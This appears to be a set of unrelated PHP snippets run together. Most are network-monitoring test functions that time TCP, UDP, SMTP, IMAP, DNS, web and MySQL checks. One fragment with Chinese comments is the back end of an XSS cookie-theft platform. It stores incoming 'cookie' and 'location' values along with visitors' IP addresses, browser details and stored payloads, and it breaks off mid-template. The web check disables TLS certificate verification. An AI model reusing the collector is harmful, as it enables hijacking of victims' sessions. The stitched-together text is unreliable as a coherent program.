function DoTest($testname, $param, $hostname, $timeout, $params) { global $NATS; $timer = new TFNTimer(); if ($timeout <= 0) { $timeout = $NATS->Cfg->Get("test.tcp.timeout", 0); } // if no test-specific param use sys default if ($timeout <= 0) { $timeout = 60; } // if sys default is <=0 then default to 60 seconds $ip = ip_lookup($hostname); if ($ip == "0") { return -2; } // lookup failed $errno = 0; $errstr = ""; $timer->Start(); $fp = @fsockopen($ip, $param, $errno, $errstr, $timeout); $elapsed = $timer->Stop(); if ($fp === false) { return -1; } // open failed @fclose($fp); return $elapsed; }
function DoTest($testname, $param, $hostname, $timeout, $params) { echo "Called for " . $hostname . " port " . $param . " timeout " . $timeout . "\n"; $timer = new TFNTimer(); $ip = ip_lookup($hostname); echo $hostname . " => " . $ip . "\n"; if ($ip == "0") { return -2; } // lookup failed echo "Lookup Successful\n"; $errno = 0; $errstr = ""; $timer->Start(); echo "Doing fsockopen()\n"; $fp = @fsockopen($ip, $param, $errno, $errstr, $timeout); $elapsed = $timer->Stop(); echo "FP is : "; echo $fp; echo "\n"; if ($fp === false) { return -1; } // open failed echo "Closing\n"; @fclose($fp); return $elapsed; }
function DoTest($testname,$param,$hostname,$timeout,$params) { // Pre-resolve DNS $ip=ip_lookup($params[0]); if ($ip=="0") return -1; // Do the test return smtp_test_time($ip,$params[1],$timeout); }
function DoTest($testname,$param,$hostname,$timeout,$params) { // 0: host, 1: user, 2: pass, 3: protocol, 4: port, 5: ssl (1/0) if ($params[5]==1) $ssl=true; else $ssl=false; $ip=ip_lookup($params[0]); if ($ip=="0") return -1; return imap_test_time($ip,$params[1],$params[2],$timeout,$params[3],$params[4],$ssl); }
function DoTest($testname, $param, $hostname, $timeout, $params) { $timer = new TFNTimer(); // First initialise DNS query object $dnsserver = $params[1]; if ($dnsserver == "") { return -3; } $dnsserver = ip_lookup($dnsserver); $url = $param; $dns_delay = $params[2]; if ($dns_delay == 0 || !is_numeric($dns_delay)) { $dns_delay = 0; } // default no extra delay if ($timeout <= 0) { $timeout = 60; } $udp = true; // initial setting $port = 53; $dns_query = new DNSQuery($dnsserver, $port, $timeout, $udp, false); // run with debug off $type = "A"; $matches = ""; $out = preg_match("@^(?:http[s]*://)?([^/|\\?|:]+)@i", $url, $matches); $hostname = $matches[1]; // strip out hostname for FQDN lookup $host_no_dots = str_replace(".", "", $hostname); if (is_numeric($host_no_dots)) { $is_ip_address = true; } else { $is_ip_address = false; } $timer->Start(); if (!$is_ip_address) { $answer = $dns_query->Query($hostname, $type); //echo "DNS"; if ($answer === false || $dns_query->error) { $udp = false; // switch to TCP $dns_query->udp = $udp; // wait! while ($timer->Stop() < $dns_delay) { usleep(100); } $answer = $dns_query->Query($hostname, $type); //echo "DNS2"; } if ($answer->count <= 0) { return -1; } // no records returned if ($answer === false) { return -1; } // object is false if ($dns_query->error) { return -1; } // DNS object error $dns_time_taken = $timer->Stop(); // if we get this far the DNS has worked $ip_address = url_lookup($url); // pre-cache DNS } else { $dns_time_taken = 0; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_MAXREDIRS, 32); if ($timeout > 0) { curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); } if ($timeout > 0) { curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); } // restart timer $timer->Start(); if (!($output = curl_exec($ch))) { $ctr = -1; // failed } else { $ctr = round(curl_getinfo($ch, CURLINFO_SIZE_DOWNLOAD) / 1024, 2); } $fetch_time_taken = $timer->Stop(); curl_close($ch); if ($ctr <= 0) { return -2; } // URL request failed return $dns_time_taken + $fetch_time_taken; // return elapsed time taken }
function url_lookup($url) { // Sod regular expressions here as we'd have to do it twice or with cleverness I lack // Is it a URL? $colon = strpos($url, ":"); if ($colon != 0) { $out = preg_match("@^(?:http[s]*://)?([^/|\\?|:]+)@i", $url, $matches); $hostname = $matches[1]; } else { $hostname = $url; } // try direct return ip_lookup($hostname); }
/***是否启用数据库***/ $use_db = true; /***数据库选项***/ $MYSQL_HOST = 'localhost'; $MYSQL_PORT = '3306'; $MYSQL_USER = '******'; $MYSQL_PASS = '******'; $MYSQL_DBNM = 'xss'; /***使用文件存储模式下,creds和payloads路径,建议使用md5哈希后的复杂目录***/ $store_path = "./e160e60f7414a7bba0b46565c1ce0646/"; /***Cookie生成规则***/ #$token = md5(md5(md5(base64_encode(date("Y-m-d").$_SERVER['REMOTE_ADDR'].$username.$password)))); $token = md5(md5(md5(base64_encode($username . $password)))); /***全局参数***/ $ip = base64_encode($_SERVER['REMOTE_ADDR']); $area = base64_encode(ip_lookup()); $time = date('Y-m-d H:i:s'); $user_lang = base64_encode($_SERVER['HTTP_ACCEPT_LANGUAGE']); $user_agent = base64_encode($_SERVER['HTTP_USER_AGENT']); /***当收到数据时触发XSS函数***/ if ($_REQUEST["cookie"] or $_REQUEST["location"]) { $cookie = base64_encode($_REQUEST['cookie']); $referer = base64_encode($_REQUEST['location']); xss(); } $common_head = <<<EOF <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/> <meta http-equiv="Cache-Control" content="max-age=0" forua="true"/>
function DoTest($testname, $param, $hostname, $timeout, $params) { global $NATS; if ($timeout <= 0) { $timeout = $NATS->Cfg->Get("test.udp.timeout", 0); } // if no test-specific param use sys default if ($timeout <= 0) { $timeout = 20; } // if sys default is <=0 then default to 60 seconds if ($params[1] != "") { $package = $params[1]; } else { $package = ""; } if ($params[2] == 1) { $reqresponse = true; } else { $reqresponse = false; } $timer = new TFNTimer(); $ip = ip_lookup($hostname); if ($ip == "0") { return -2; } // lookup failed $connstr = "udp://" . $ip; $errno = 0; $errstr = ""; $timer->Start(); $fp = @fsockopen($connstr, $param, $errno, $errstr, $timeout); if ($fp === false) { return -1; } // open failed stream_set_timeout($fp, $timeout); $write = fwrite($fp, $package); // send some data if (!$write) { return -3; } // failed to send data $read = fgets($fp); @fclose($fp); $elapsed = $timer->Stop(); if (!$read) { if ($reqresponse) { return -4; } else { if (round($elapsed, 0) < $timeout) { return -5; // looks like a hard reject e.g. ICMP port unreachable } } } if ($elapsed == 0) { $elapsed = "0.001"; } return $elapsed; }
function DoTest($testname, $param, $hostname, $timeout, $params) { // 0: host, 1: user, 2: pass, 3: database, 4: query if ($testname == "mysql") { $ip = ip_lookup($param); if ($ip == "0") { return -1; } // cache only as 127.0.0.1 is not the same connection as localhost for MySQL auth! return mysql_test_time($param, $params[1], $params[2], $params[3], $timeout, $params[4]); } else { if ($testname == "mysqlrows") { $ip = ip_lookup($param); if ($ip == "0") { return -1; } // cache only - see above return mysql_test_rows($param, $params[1], $params[2], $params[3], $timeout, $params[4]); } else { if ($testname == "mysqldata") { $ip = ip_lookup($param); if ($ip == "0") { return -1; } return mysql_test_data($param, $params[1], $params[2], $params[3], $timeout, $params[4], $params[5]); } else { return -1; } } } }